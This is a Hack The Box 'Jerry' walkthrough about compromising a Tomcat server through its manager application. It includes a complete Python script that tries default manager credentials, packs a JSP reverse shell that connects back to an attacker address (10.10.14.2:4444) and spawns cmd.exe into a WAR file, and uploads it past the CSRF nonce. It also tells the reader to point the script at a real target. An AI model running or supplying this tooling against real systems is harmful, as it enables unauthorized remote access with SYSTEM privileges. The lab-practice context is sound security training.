Hack The Box – Jerry Walkthrough
Introduction
This was a very easy box: it involved logging into the Tomcat Web Application Manager with default credentials, deploying a malicious .war file containing a JSP reverse shell as a new application, and triggering the shell by browsing to it.
Enumeration
The first step is a TCP Nmap scan against the 1000 most common ports (Nmap's default), using the following flags:
- -sC to run default scripts
- -sV to enumerate application versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
Enumerating the HTTP Port
Browsing to the web server shows the Tomcat default home page.
Navigating to /manager, the Tomcat Web Application Manager used to deploy, start and stop applications, brings up an HTTP Basic authentication prompt.
A Google search for default Tomcat credentials turns up a handful of common username/password pairs shipped in example tomcat-users.xml files.
After trying a few of them, tomcat/s3cret allows logging in.
Tomcat .war file upload exploitation
The manager allows deploying .war files as applications. A .war is a ZIP archive containing the JSPs, classes and descriptors of a Java web application, so a JSP reverse shell can be packaged as a .war, deployed through the manager and executed simply by requesting it, giving remote access.
Generating a JSP reverse-shell payload and saving it as a .war file with MSFvenom, using the following flags:
- -p to specify the payload type, in this case the Java JSP reverse shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
Selecting the file in the “WAR file to deploy” form of the manager page's Deploy section and clicking Deploy.
After deploying the .war file, the new application appears in the application list under a context path named after the file.
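The two manual steps above (guessing the manager credentials, then uploading the .war through the Deploy form) can be scripted. The following is an added example written for this page, not tooling from the walkthrough, using only the Python standard library. It assumes an attacker address of 10.10.14.2 with a listener on port 4444, a constructed list of default credentials, and a constructed `_FakeManager` so the whole chain runs offline; the embedded JSP is a hand-written equivalent of what `msfvenom -p java/jsp_shell_reverse_tcp LHOST=... LPORT=... -f war -o shell.war` produces. Two details matter in practice and are handled here: the upload form is protected by Tomcat's CSRF nonce, which is bound to the JSESSIONID session, so the POST must carry both the nonce from the manager page and that session's cookie; and a 403 (rather than 401) on /manager/html means the password is right but the account lacks the manager-gui role.

```python
"""Tomcat manager helper: default-credential check, in-memory WAR build and upload.
Added example, not the walkthrough's tooling; IP/port, credential list and the fake
manager used for offline runs are all constructed."""
import base64, io, re, threading, urllib.error, urllib.request, zipfile
from http.server import BaseHTTPRequestHandler, HTTPServer

# Common manager defaults; tomcat/s3cret is the pair that worked on Jerry.
DEFAULT_CREDS = [("admin", "admin"), ("tomcat", "tomcat"), ("tomcat", "s3cret"), ("both", "tomcat")]
# Shared cookie jar: the manager's CSRF nonce is bound to the JSESSIONID session,
# so the upload must reuse the session that fetched the page.
OPENER = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
NONCE_PARAM = "org.apache.catalina.filters.CSRF_NONCE"

def _request(url, user, pw, data=None, ctype=None):
    """Basic-auth GET, or POST when data is given; returns (status, body)."""
    auth = base64.b64encode(f"{user}:{pw}".encode()).decode()
    hdrs = {"Authorization": "Basic " + auth, **({"Content-Type": ctype} if ctype else {})}
    try:
        with OPENER.open(urllib.request.Request(url, data, hdrs), timeout=10) as r:
            return r.status, r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:  # 401: wrong password; 403: no manager-gui role
        return e.code, e.read().decode(errors="replace")

def find_manager_creds(base, creds=DEFAULT_CREDS):  # first pair that opens the manager
    for user, pw in creds:
        if _request(base + "/manager/html", user, pw)[0] == 200:
            return user, pw
    return None
# Hand-written equivalent of msfvenom's java/jsp_shell_reverse_tcp payload.
REVERSE_JSP = """<%@ page import="java.io.*,java.net.*" %><%
Socket s = new Socket("__LHOST__", __LPORT__);
Process p = new ProcessBuilder("__SHELL__").redirectErrorStream(true).start();
InputStream pi = p.getInputStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
  while (pi.available() > 0) so.write(pi.read());
  while (si.available() > 0) po.write(si.read());
  so.flush(); po.flush();
  try { Thread.sleep(50); p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close(); %>"""

def build_war(lhost, lport, jsp_name="index.jsp", shell="cmd.exe"):
    """A WAR is a zip; Tomcat 7+ deploys it with no web.xml and serves /<ctx>/<jsp_name>."""
    jsp = (REVERSE_JSP.replace("__LHOST__", lhost)
           .replace("__LPORT__", str(lport)).replace("__SHELL__", shell))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(jsp_name, jsp)
    return buf.getvalue()

def deploy_war(base, user, pw, war_name, war_bytes):
    """POST the WAR to the form behind the GUI's Deploy section; True once it is listed."""
    status, page = _request(base + "/manager/html", user, pw)
    nonce = re.search(re.escape(NONCE_PARAM) + r"=([0-9A-Fa-f]+)", page if status == 200 else "")
    if not nonce:
        raise RuntimeError(f"manager page unusable (HTTP {status})")
    b = "----warupload"
    body = (f'--{b}\r\nContent-Disposition: form-data; name="deployWar"; filename='
            f'"{war_name}"\r\nContent-Type: application/octet-stream\r\n\r\n').encode()
    body += war_bytes + f"\r\n--{b}--\r\n".encode()
    status, page = _request(f"{base}/manager/html/upload?{NONCE_PARAM}={nonce.group(1)}",
                            user, pw, body, "multipart/form-data; boundary=" + b)
    return status == 200 and ("/" + war_name[:-4]) in page

class _FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in: Basic auth, a nonce in the page, upload accepts only a zip."""
    GOOD = "Basic " + base64.b64encode(b"tomcat:s3cret").decode()
    NONCE, apps = "DEADBEEF", ["/manager"]
    def _reply(self, code, body=""):
        self.send_response(code)
        self.end_headers()
        self.wfile.write(body.encode())
    def do_GET(self):
        if self.headers.get("Authorization") != self.GOOD:
            return self._reply(401)
        self._reply(200, "".join(f'<a href="/manager/html/stop?path={a}&{NONCE_PARAM}='
                                 f'{self.NONCE}">{a}</a>' for a in self.apps))
    def do_POST(self):
        if self.headers.get("Authorization") != self.GOOD:
            return self._reply(401)
        if f"/manager/html/upload?{NONCE_PARAM}={self.NONCE}" not in self.path:
            return self._reply(403)  # what the CSRF filter does with a missing/stale nonce
        raw = self.rfile.read(int(self.headers["Content-Length"]))
        name = re.search(rb'filename="([^"]+)\.war"', raw).group(1).decode()
        blob = raw.split(b"\r\n\r\n", 1)[1].rsplit(b"\r\n--", 1)[0]
        if zipfile.is_zipfile(io.BytesIO(blob)):
            self.apps.append("/" + name)
        self.do_GET()  # the real manager re-renders the application list after an upload

def demo():
    """Run the chain against the fake manager: (creds, deployed, entries in the WAR)."""
    with HTTPServer(("127.0.0.1", 0), _FakeManager) as srv:
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        base = f"http://127.0.0.1:{srv.server_address[1]}"
        creds = find_manager_creds(base)
        war = build_war("10.10.14.2", 4444)  # assumed attacker IP and listener port
        deployed = deploy_war(base, *creds, "shell.war", war)
        srv.shutdown()
    return creds, deployed, zipfile.ZipFile(io.BytesIO(war)).namelist()
```

Against a real target, replace `_FakeManager` with the Tomcat base URL (for example `http://target:8080`) and call `find_manager_creds`, `build_war` and `deploy_war` in that order with the listener already running. The manager's text interface (`/manager/text/deploy`) would avoid the nonce dance, but it requires the manager-script role, which a GUI-only account such as the one found here does not have.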
The next step is to set up a Netcat listener to catch the reverse shell when the victim host executes the payload, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on (the same port given as LPORT to MSFvenom)
Browsing to the newly deployed application (its context path in the manager list) executes the JSP and triggers the connection back.
This grants a reverse shell, as expected.
The shell runs as SYSTEM because the Tomcat service on this box runs as SYSTEM, so no privilege escalation is required (a hardened install would run Tomcat under a dedicated low-privilege service account).
Conclusion
This is probably one of the easiest boxes on Hack The Box, but it is still useful if you have never exploited a Tomcat manager with a .war upload before, as it is a very common technique that every penetration tester should know.